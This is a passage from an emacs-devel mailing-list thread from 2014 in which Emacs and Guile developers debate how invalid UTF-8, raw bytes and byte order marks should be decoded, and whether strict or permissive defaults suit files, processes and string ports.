* Re: Emacs Lisp's future 2014-10-07 15:15 ` Mark H Weaver 2014-10-07 15:31 ` Andreas Schwab @ 2014-10-07 16:59 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-07 16:59 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen > From: Mark H Weaver <mhw@netris.org> > Cc: Richard Stallman <rms@gnu.org>, Eli Zaretskii <eliz@gnu.org>, dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org > Date: Tue, 07 Oct 2014 11:15:05 -0400 > > > UTF-8 is defined as not containing "overlong" sequences, so Emacs > > decodes them into two raw-byte indicating characters, one indicating > > 0xC0, one indicating 0xA2. When encoding, it reassembles them into > > 0xC0 0xA2. > > When editing a file, this is probably the right default behavior, > although ideally it should warn the user. It does, when the user modifies the file and then saves it. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-07 14:14 ` David Kastrup [not found] ` <"<83y4srjaot.fsf"@gnu.org> 2014-10-07 15:15 ` Mark H Weaver @ 2014-10-08 0:47 ` Richard Stallman 2014-10-08 7:13 ` Eli Zaretskii 2014-10-09 7:36 ` David Kastrup 2 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-08 0:47 UTC (permalink / raw) To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] UTF-8 is defined as not containing "overlong" sequences, so Emacs decodes them into two raw-byte indicating characters, one indicating 0xC0, one indicating 0xA2. When encoding, it reassembles them into 0xC0 0xA2. In that case, it might be reasonable to ask the user whether to accept a UTF-8 file decoding that contains any raw-byte characters. What do people think of this? One problem with that is that quite often Emacs' choice of a coding system for a buffer is the result of heuristics rather than dependable information. Not making a fuzz might often be simplest. Could you explain what "fuzz" means here? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 0:47 ` Richard Stallman @ 2014-10-08 7:13 ` Eli Zaretskii 2014-10-09 1:19 ` Richard Stallman 2014-10-09 7:36 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-08 7:13 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Tue, 07 Oct 2014 20:47:04 -0400 > From: Richard Stallman <rms@gnu.org> > CC: eliz@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > UTF-8 is defined as not containing "overlong" sequences, so Emacs > decodes them into two raw-byte indicating characters, one indicating > 0xC0, one indicating 0xA2. When encoding, it reassembles them into > 0xC0 0xA2. > > In that case, it might be reasonable to ask the user whether to accept > a UTF-8 file decoding that contains any raw-byte characters. > > What do people think of this? We do ask, but only at buffer save time. Asking questions when visiting a file is perceived as a nuisance, because our heuristics that detect these cases are imperfect and tend to have high enough false positive rate that annoys people. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 7:13 ` Eli Zaretskii @ 2014-10-09 1:19 ` Richard Stallman 2014-10-09 7:21 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-09 1:19 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Regading files: We do ask, but only at buffer save time. Asking questions when visiting a file is perceived as a nuisance, because our heuristics that detect these cases are imperfect and tend to have high enough false positive rate that annoys people. Asking about invalid UTF-8 in a file could be a nuisance, but how much of a nuisance depends on the details of what we do. Since this has some security implications, it is worth a small amount of nuisance. What exactly did we try before? Meanwhile, in a separate message I wrote about non-file operations: > We can set the defaults for those non-frile interfaces so as to reject > invalid UTF-8 sequences. Then a program could specify to override the > default and allow them. That has been tried (not with UTF-8, but I don't think this matters), and failed miserably. I don't think we are talking about the same thing. I am talking about Lisp functions to do conversions on text that does NOT come from files. You seem to be talking about operations on files: The experience taught us that Emacs users definitely don't want Emacs to do _anything_ about the unmodified parts of text, except copy it verbatim. Even the question we ask at buffer-save time is sometimes reported as an annoyance. It looks like you're grouping the two cases together, while I am treating them separately. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 1:19 ` Richard Stallman @ 2014-10-09 7:21 ` Eli Zaretskii 2014-10-09 7:52 ` David Kastrup ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-09 7:21 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Wed, 08 Oct 2014 21:19:54 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > We do ask, but only at buffer save time. Asking questions when > visiting a file is perceived as a nuisance, because our heuristics > that detect these cases are imperfect and tend to have high enough > false positive rate that annoys people. > > Asking about invalid UTF-8 in a file could be a nuisance, but how much > of a nuisance depends on the details of what we do. Since this has > some security implications, it is worth a small amount of nuisance. That wasn't what users felt, overwhelmingly. > What exactly did we try before? AFAIR, we tried converting raw bytes into valid non-ASCII characters, and perhaps also replacing them with the equivalent of u+FFFD, the Unicode "replacement character". > Meanwhile, in a separate message I wrote about non-file operations: Well, you said "frile", which confused me ;-) However, ... > > We can set the defaults for those non-frile interfaces so as to reject > > invalid UTF-8 sequences. Then a program could specify to override the > > default and allow them. > > That has been tried (not with UTF-8, but I don't think this matters), > and failed miserably. > > I don't think we are talking about the same thing. I am talking about Lisp > functions to do conversions on text that does NOT come from files. ... Emacs treats all of these cases the same. For text we are going to send to a process or network stream, we ask the above-mentioned question at the time we encode the internal representation into the external byte stream we are about to send. E.g., you can see that in action in sending mail if you insert some raw bytes into a mail message in a *mail* buffer, and then try sending it. There's no file involved here, at least not as far as Emacs is concerned, and yet you will see the same prompt asking you to select a proper encoding. > You seem to be talking about operations on files: > > The experience taught us that Emacs users > definitely don't want Emacs to do _anything_ about the unmodified > parts of text, except copy it verbatim. Even the question we ask at > buffer-save time is sometimes reported as an annoyance. > > It looks like you're grouping the two cases together, > while I am treating them separately. Emacs treats them both the same way, and uses the same low-level primitives that generally don't know the purpose of the byte stream they are encoding or decoding. All they know is whether the source resp. destination is a buffer, a string, or a gap in the buffer text, which is insufficient to distinguish between the 2 use cases you are trying to treat separately. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:21 ` Eli Zaretskii @ 2014-10-09 7:52 ` David Kastrup 2014-10-09 8:41 ` Eli Zaretskii 2014-10-10 14:24 ` Richard Stallman 2014-10-10 14:24 ` Richard Stallman 2 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-09 7:52 UTC (permalink / raw) To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> I don't think we are talking about the same thing. I am talking >> about Lisp functions to do conversions on text that does NOT come >> from files. > > ... Emacs treats all of these cases the same. Well, on a fine-grained level. We have something like Coding system for saving this buffer: U -- utf-8-emacs-unix (alias: emacs-internal) Default coding system (for new files): U -- utf-8-unix (alias: mule-utf-8-unix) Coding system for keyboard input: U -- utf-8-unix (alias: mule-utf-8-unix) Coding system for terminal output: U -- utf-8-unix (alias: mule-utf-8-unix) Coding system for inter-client cut and paste: nil Defaults for subprocess I/O: decoding: U -- utf-8-unix (alias: mule-utf-8-unix) encoding: U -- utf-8-unix (alias: mule-utf-8-unix) Priority order for recognizing coding systems when reading files: 1. utf-8 (alias: mule-utf-8) 2. iso-2022-7bit 3. iso-latin-1 (alias: iso-8859-1 latin-1) 4. iso-2022-7bit-lock (alias: iso-2022-int-1) 5. iso-2022-8bit-ss2 6. emacs-mule [...] 20. undecided Other coding systems cannot be distinguished automatically from these, and therefore cannot be recognized automatically with the present coding system priorities. Particular coding systems specified for certain file names: OPERATION TARGET PATTERN CODING SYSTEM(s) --------- -------------- ---------------- File I/O "\\.dz\\'" (no-conversion . no-conversion) "\\.txz\\'" (no-conversion . no-conversion) [...] Process I/O nothing specified Network I/O nothing specified > For text we are going to send to a process or network stream, we ask > the above-mentioned question at the time we encode the internal > representation into the external byte stream we are about to send. It depends on how you specify the coding system. When setting the principally responsible variable for an operation, you get no questions asked. When setting some user-level specifiable preference, Emacs will prompt for alternatives when accepting that preference unasked would likely have user-level consequences that might or might not be acceptable. > E.g., you can see that in action in sending mail if you insert some > raw bytes into a mail message in a *mail* buffer, and then try sending > it. There's no file involved here, at least not as far as Emacs is > concerned, and yet you will see the same prompt asking you to select a > proper encoding. Well, in the case of mail that makes sense since otherwise the content will not likely survive the designated channel. It is perfectly reasonable in my book to not silently go through with operations leading to a an expected loss of information. I still don't want the autosave of mail to complain about bad characters. It's important that an application can pick where to apply its checks and balances itself. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:52 ` David Kastrup @ 2014-10-09 8:41 ` Eli Zaretskii 2014-10-09 9:22 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-09 8:41 UTC (permalink / raw) To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen > From: David Kastrup <dak@gnu.org> > Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org > Date: Thu, 09 Oct 2014 09:52:31 +0200 > > I still don't want the autosave of mail to complain about bad > characters. We write the auto-save files in the internal format, so it never complains. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 8:41 ` Eli Zaretskii @ 2014-10-09 9:22 ` David Kastrup 2014-10-13 3:04 ` Mark H Weaver 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-09 9:22 UTC (permalink / raw) To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> From: David Kastrup <dak@gnu.org> >> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru, >> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, >> stephen@xemacs.org >> Date: Thu, 09 Oct 2014 09:52:31 +0200 >> >> I still don't want the autosave of mail to complain about bad >> characters. > > We write the auto-save files in the internal format, so it never > complains. If you are not allowed or able to do that... At the current point of time, the only round-trippable encoding for bytes that GUILE offers is latin-1, and the only round-trippable encoding for characters is utf-8. The conceptual lack of separation between internal and external utf-8 encoding leads to strangenesses like scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char) $8 = #\! Yes, this is a string->string operation losing a byte order mark in spite of no indication that I would like to get encodings involved in any manner. Now we'll probably get "oh, that's a bug, we'll fix it". But the point is that being sloppy with the distinction between internal and external character sets and encodings and "valid" and "invalid" will buy you unmatched encoding/decoding passes inviting such problems. And when I can say "let's see where this kind of thinking will lead" and find a hole to poke within a minute, so will malicious people. And that is a real security concern. Also: if I do not even manage to save a string into a string in "the internal format" unchanged, good luck with your auto-save file. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 9:22 ` David Kastrup @ 2014-10-13 3:04 ` Mark H Weaver 2014-10-13 7:41 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-10-13 3:04 UTC (permalink / raw) To: David Kastrup Cc: rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen David Kastrup <dak@gnu.org> writes: > Eli Zaretskii <eliz@gnu.org> writes: > >>> From: David Kastrup <dak@gnu.org> >>> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru, >>> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, >>> stephen@xemacs.org >>> Date: Thu, 09 Oct 2014 09:52:31 +0200 >>> >>> I still don't want the autosave of mail to complain about bad >>> characters. >> >> We write the auto-save files in the internal format, so it never >> complains. > > If you are not allowed or able to do that... At the current point of > time, the only round-trippable encoding for bytes that GUILE offers is > latin-1, and the only round-trippable encoding for characters is utf-8. "Not allowed"? Another strawman. I guess it's a waste of time for me to say, yet again, that we'll support the "raw bytes" encodings, because you'll just keep on pretending that we won't allow it. > The conceptual lack of separation between internal and external utf-8 > encoding leads to strangenesses like > > scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char) > $8 = #\! > > Yes, this is a string->string operation losing a byte order mark in > spite of no indication that I would like to get encodings involved in > any manner. Byte Order Marks are an ugly corner of Unicode, and I spent a lot of effort to try to do the right thing here. What we do in Guile is described here: https://www.gnu.org/software/guile/manual/html_node/BOM-Handling.html I agree that we should inhibit BOM handling for string ports. > And when I can say "let's see where this kind of thinking will lead" and > find a hole to poke within a minute, BTW, your claim that you found this hole "within a minute" is a bald-faced lie and you know it. In <http://bugs.gnu.org/18520>, I stated my belief that our internal use of UTF-8 in string ports was not visible to the application as long as you didn't manually change the encoding for the string port or use seek/ftell. That was on Sept 24th. You spent a *lot* of time arguing with us in that bug report, and this is exactly the observation you could have used to bolster your argument, but you never found it until now. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 3:04 ` Mark H Weaver @ 2014-10-13 7:41 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-13 7:41 UTC (permalink / raw) To: Mark H Weaver Cc: rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Mark H Weaver <mhw@netris.org> writes: > David Kastrup <dak@gnu.org> writes: > >> The conceptual lack of separation between internal and external utf-8 >> encoding leads to strangenesses like >> >> scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char) >> $8 = #\! >> >> Yes, this is a string->string operation losing a byte order mark in >> spite of no indication that I would like to get encodings involved in >> any manner. > > Byte Order Marks are an ugly corner of Unicode, and I spent a lot of > effort to try to do the right thing here. What we do in Guile is > described here: > > https://www.gnu.org/software/guile/manual/html_node/BOM-Handling.html > > I agree that we should inhibit BOM handling for string ports. > >> And when I can say "let's see where this kind of thinking will lead" and >> find a hole to poke within a minute, > > BTW, your claim that you found this hole "within a minute" is a > bald-faced lie and you know it. > In <http://bugs.gnu.org/18520>, I stated my belief that our internal > use of UTF-8 in string ports was not visible to the application as > long as you didn't manually change the encoding for the string port or > use seek/ftell. That was on Sept 24th. Uh, my claim was not that I found this problem a minute after first thinking about GUILE's string handling. It was more about how long it took me after deciding to look for an example for _this_ discussion. Now my above description may not be accurate since "let's see where this kind of thinking will lead" is obviously not something that occured to me just these days, or even these years. So it applied to the more concrete case of reading in the GUILE manual about its BOM handling, making the connection to string ports, thinking "now that's likely to be another half-baked bean", and finding that issue by experiment. To the best of my memory, this _was_ the first time I read about BOM handling in GUILE. That does not mean that I can vouch for this page never having been on-screen before, or even me having skimmed through it. But it definitely is the first time I remember having read it now. > You spent a *lot* of time arguing with us in that bug report, and this > is exactly the observation you could have used to bolster your > argument, but you never found it until now. Because I did not look for it before. At any rate, in relation to that bug report I had a different actual example exposed in <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18520#41> (for which I provided a patch in <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18536>). Here the attempt to create an open-coded fast path to speed up a few gratuitous conversions when reading numbers from a string port (encode to UTF-8 because string ports are implemented as byte streams, decode when reading, reencode when ungetting the non-digit read after the last digit, redecode when reading it again...). I think it was more or less sorted into the "one bug does not demonstrate a problem" category. That bug jumped out at me not when I was searching for a redecoding problem but rather when I looked at the code in ports.c (which that issue was about) after musing "how are they going to unread in a string port?". And the open-coded conversion was there to to avoid calling the apparently slow libunistring (yes, libunistring) function u32_conv_to_encoding <URL:https://www.gnu.org/software/libunistring/manual/html_node/uniconv_002eh.html>. Bugs happen. But code that is not called in the first place can cause no bug. At any rate, when looking for a snappy "this might not work well with reencoding example" on the Emacs Lisp, I first looked at surrogate words. Well, (integer->char #xd800) throws an out-of-range error. So one is not even allowed to talk about surrogate words at the character/word level, look for them with regular expressions and so on. I have some choice words for that as well, but it's not a bug. It's pretty much a necessary consequence of the design that does not give representation to input outside of the proper UTF-8 range. Since "not practical" was already cried down as a consideration in this discussion, I wanted an actual bug rather than just a refusal to work with things defined as invalid. So I looked in the GUILE manual to see whether I could find something about surrogate words and instead chanced upon "BOM" which apparently _was_ allowed into strings, so I just thought "oh, that could be an equally bad can of worms". And admittedly, my first try was using the string port in the other direction, namely with-output-to-string. From the description I'd have expected _that_ to blow up rather than the other way round. And the time from "oh, this one could be bad as well" to finding the problem (I am not even sure it is a bug rather than a particularly jarring but logical consequence of the way string ports are defined in GUILE as a byte stream with encoding) was not more than a few minutes at best. A fix will likely be equally fast to do, and there is a school that every sufficiently patched-up software is indistinguishable from design. So that's the history of this bald-faced lie of mine. I am sure that I offer better opportunities for ad hominem attacks than that. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:21 ` Eli Zaretskii 2014-10-09 7:52 ` David Kastrup @ 2014-10-10 14:24 ` Richard Stallman 2014-10-10 15:28 ` Eli Zaretskii 2014-10-10 14:24 ` Richard Stallman 2 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-10 14:24 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > I don't think we are talking about the same thing. I am talking about Lisp > functions to do conversions on text that does NOT come from files. ... Emacs treats all of these cases the same. They don't HAVE to be treated the same. We are talking about changes, here. But changes may not be needed. All operations that do encoding or decoding allow explicit specification of the coding system. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-10 14:24 ` Richard Stallman @ 2014-10-10 15:28 ` Eli Zaretskii 2014-10-11 1:15 ` Richard Stallman 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-10 15:28 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Fri, 10 Oct 2014 10:24:36 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > > I don't think we are talking about the same thing. I am talking about Lisp > > functions to do conversions on text that does NOT come from files. > > ... Emacs treats all of these cases the same. > > They don't HAVE to be treated the same. We are talking about changes, > here. They will be very deep and invasive changes, because currently the encoding/decoding routines don't know the purpose of the stuff they are producing. > But changes may not be needed. All operations that do encoding or > decoding allow explicit specification of the coding system. Of course, they do. But the issue at hand is precisely whether it is the application's responsibility to explicitly specify conversions that will be strict wrt invalid byte sequences, or should Emacs do that by default. There's no argument that there are facilities in Emacs to do both. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-10 15:28 ` Eli Zaretskii @ 2014-10-11 1:15 ` Richard Stallman 2014-10-11 7:18 ` David Kastrup 2014-10-11 7:18 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-11 1:15 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > They don't HAVE to be treated the same. We are talking about changes, > here. They will be very deep and invasive changes, because currently the encoding/decoding routines don't know the purpose of the stuff they are producing. No, it's just a matter of setting some parameter to specify a particular decision in decoding or encoding behavior. > But changes may not be needed. All operations that do encoding or > decoding allow explicit specification of the coding system. Of course, they do. But the issue at hand is precisely whether it is the application's responsibility to explicitly specify conversions that will be strict wrt invalid byte sequences, or should Emacs do that by default. Yes. It will be easy to specify one or the other, so why not make the default be strict, except in the primitives that operate on files? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 1:15 ` Richard Stallman @ 2014-10-11 7:18 ` David Kastrup 2014-10-12 3:22 ` Richard Stallman 2014-10-11 7:18 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-11 7:18 UTC (permalink / raw) To: Richard Stallman Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > > They don't HAVE to be treated the same. We are talking about changes, > > here. > > They will be very deep and invasive changes, because currently the > encoding/decoding routines don't know the purpose of the stuff they > are producing. > > No, it's just a matter of setting some parameter to specify a particular > decision in decoding or encoding behavior. > > > But changes may not be needed. All operations that do encoding or > > decoding allow explicit specification of the coding system. > > Of course, they do. But the issue at hand is precisely whether it is > the application's responsibility to explicitly specify conversions > that will be strict wrt invalid byte sequences, or should Emacs do > that by default. > > Yes. > > It will be easy to specify one or the other, so why not make the default > be strict, except in the primitives that operate on files? Because we had that already. It made the users mad, it threw spanners in the work of the programmers, and there is a large body of software developed before then and since then that depends on Emacs working rather than throwing a fit. When we lost users in large droves to XEmacs at the time Emacs became the loss leader for multibyte encodings by making MULE manadatory, a significant number of those users who went were the ones not even using non-ASCII locales, and they would purportedly not even have noticed a difference with the files they were supposed to be working with. But in practice, files and communications don't pass the purity tests. When you have a secretary working for you, you are not interested in the secretary getting each grammatical error in a letter you got sent circled in red. When I read a mail from an issue ticketing system that has not encoded/decoded some mail headers properly along with the rest, I still want to be able to read what is there _before_ making decisions about encodings. Most of the time I don't want to make _any_ decision and just go ahead with what I got. And frankly: if Emacs refuses to show me what it got before I make a decision, I have no _base_ for making a decision in the first place. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 7:18 ` David Kastrup @ 2014-10-12 3:22 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-12 3:22 UTC (permalink / raw) To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > It will be easy to specify one or the other, so why not make the default > be strict, except in the primitives that operate on files? Because we had that already. What exactly did we have already? Are we talking about the same thing? When we lost users in large droves to XEmacs at the time Emacs became the loss leader for multibyte encodings by making MULE manadatory, a significant number of those users who went were the ones not even using non-ASCII locales, and they would purportedly not even have noticed a difference with the files they were supposed to be working with. But in practice, files and communications don't pass the purity tests. I'm talking about the default for encodings that are NOT done for reading and writing files. You seem to be talking about files. > There are many ways for two different designs to be "similar". They > are also different. The details are crucial for users' reactions. I > think the people who objected to those behaviors, which involved > changing the file contents, might not mind the confirmation much. That kind of choice would require the assumption that any file operation (and any other encoding/decoding action) is an immediate, direct, and obvious consequence of a user interaction with Emacs. I don't quite follow you. Could you present a concrete example to show what you mean? However, I think I follow part of it. If a program does explicit encoding and decoding operations but does them as part of showing text to the user, it should specify doing them in the same flexible way used by the usual file operations. For instance, decoding an email to show to the user should be done the flexible way. It won't be hard to change these programs to specify "flexible" for the decoding if that is not the default for the encoding primitives. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 1:15 ` Richard Stallman 2014-10-11 7:18 ` David Kastrup @ 2014-10-11 7:18 ` Eli Zaretskii 2014-10-11 23:51 ` Mark H Weaver 2014-10-12 3:24 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-11 7:18 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Fri, 10 Oct 2014 21:15:26 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > > They don't HAVE to be treated the same. We are talking about changes, > > here. > > They will be very deep and invasive changes, because currently the > encoding/decoding routines don't know the purpose of the stuff they > are producing. > > No, it's just a matter of setting some parameter to specify a particular > decision in decoding or encoding behavior. Specify, and then drag it all the way down the encoding/decoding machinery. > > But changes may not be needed. All operations that do encoding or > > decoding allow explicit specification of the coding system. > > Of course, they do. But the issue at hand is precisely whether it is > the application's responsibility to explicitly specify conversions > that will be strict wrt invalid byte sequences, or should Emacs do > that by default. > > Yes. > > It will be easy to specify one or the other, so why not make the default > be strict, except in the primitives that operate on files? Because I believe this will annoy users and cause a lot of complaining. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 7:18 ` Eli Zaretskii @ 2014-10-11 23:51 ` Mark H Weaver 2014-10-12 1:35 ` Stephen J. Turnbull 2014-10-12 5:37 ` Eli Zaretskii 2014-10-12 3:24 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-11 23:51 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen Eli Zaretskii <eliz@gnu.org> writes: >> Date: Fri, 10 Oct 2014 21:15:26 -0400 >> From: Richard Stallman <rms@gnu.org> >> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, >> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, >> stephen@xemacs.org >> >> > They don't HAVE to be treated the same. We are talking about changes, >> > here. >> >> They will be very deep and invasive changes, because currently the >> encoding/decoding routines don't know the purpose of the stuff they >> are producing. >> >> No, it's just a matter of setting some parameter to specify a particular >> decision in decoding or encoding behavior. > > Specify, and then drag it all the way down the encoding/decoding > machinery. The strictness flag should conceptually be part of the encoding, and thus associated with the I/O port. This would obviate the need to propagate it down through layers of code. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 23:51 ` Mark H Weaver @ 2014-10-12 1:35 ` Stephen J. Turnbull 2014-10-12 8:38 ` David Kastrup 2014-10-12 5:37 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-12 1:35 UTC (permalink / raw) To: Mark H Weaver Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii Mark H Weaver writes: > Eli Zaretskii <eliz@gnu.org> writes: > > Specify, and then drag it all the way down the encoding/decoding > > machinery. > > The strictness flag should conceptually be part of the encoding, and > thus associated with the I/O port. This is the way Emacs works already. However, I think the Python system, where strictness is part of the I/O port, not the encoding, and the encodings are designed to error and then hand the invalid raw bytes to the error handler if desired, is a better API. I don't know how easy it would be to provide this in Emacs (XEmacs streams are quite different from Emacs'), but it's probably not too hard since the rawbytes facility is already present. It would be nice to extend that to EOL handling as well IMO, but that's not as big an issue. > This would obviate the need to propagate it down through layers of > code. It's not so easy, because the layers of code referred to are not the encoding/decoding machinery in the sense of the coding system (ISTR you use "codec", Emacs calls them "coding systems" to be more like ISO 2022 "coding extensions" IIRC). It's the mechanism for determining exactly which coding system is to be used, and the difficulties are really in the area of UI more so than in API. In Emacs Lisp there's a tradition of embedding parameters which are normally specified as constants in the name. (This issue has already been referred to in different terms.) So instead of ;; these IO functions are all imaginary (let ((s (open-file "foo"))) (set-stream-coding-system s 'utf-8) (set-stream-eol s 'unix) ; EOL is LF (set-stream-invalid-coding-handler s 'strict) ;; now we can do I/O, signaling errors on invalid coding (read-stream-into-buffer s)) ;; and now we're ready to edit, assuming valid coding! Emacs does (find-file "foo" 'utf-8-unix-strict) ; or is it utf-8-strict-unix? arghh! Things are further complicated by the fact that Emacs has an extremely complex system for specifying the encoding and the newline convention used, and either or both might be automatically detected. All of the parameters can be tweaked at any stage in the specification routines, and there are about 5 levels of configurability for files (configuration is done by setting or binding dynamic variables) and more than one for 